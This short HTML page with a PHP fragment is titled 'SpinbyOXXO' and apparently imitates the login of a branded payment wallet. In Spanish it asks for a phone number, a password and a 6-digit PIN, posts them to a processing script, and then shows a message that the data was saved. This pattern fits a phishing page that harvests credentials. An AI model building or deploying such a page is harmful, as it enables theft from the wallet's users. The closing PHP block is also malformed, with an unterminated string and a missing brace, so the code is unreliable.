<!DOCTYPE html>
<html>
<head>
  <title>SpinbyOXXO</title>
  <style>
    body {
      background-color: black;
      color: white;
    }
    
    h1 {
      color: rgb(106, 18, 109);
    }
    
    .container {
      max-width: 400px;
      margin: 0 auto;
      padding: 20px;
      background-color: white;
      border-radius: 5px;
    }
    
    .form-group {
      margin-bottom: 20px;
    }
    
    .form-group label {
      display: block;
      margin-bottom: 5px;
    }
    
    .form-group input {
      width: 100%;
      padding: 10px;
      border: 1px solid black;
      border-radius: 5px;
    }
    
    .form-group input[type="submit"] {
      background-color: orange;
      color: white;
      cursor: pointer;
    }
    
    .success-message {
      background-color: black;
      color: orange;
      padding: 10px;
      border-radius: 5px;
      text-align: center;
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>SpinbyOXXO</h1>
    <form action="procesar_formulario.php" method="POST">
      <div class="form-group">
        <label for="phone">Número de Teléfono:</label>
        <input type="tel" id="phone" name="phone" placeholder="Ingresa tu número de teléfono">
      </div>
      <div class="form-group">
        <label for="password">Contraseña:</label>
        <input type="password" id="password" name="password" placeholder="Ingresa tu contraseña">
      </div>
      <div class="form-group">
        <label for="pin">PIN (6 dígitos):</label>
        <input type="number" id="pin" name="pin" min="100000" max="999999" placeholder="Ingresa tu PIN de 6 dígitos">
      </div>
      <div class="form-group">
        <input type="submit" value="Enviar">
      </div>
    </form>
    
    <?php
    if (isset($_GET["success"])) {
      echo '<div class="success-message">Los datos se han guardado correctamente.</div>
  </div>
</body>
</html>
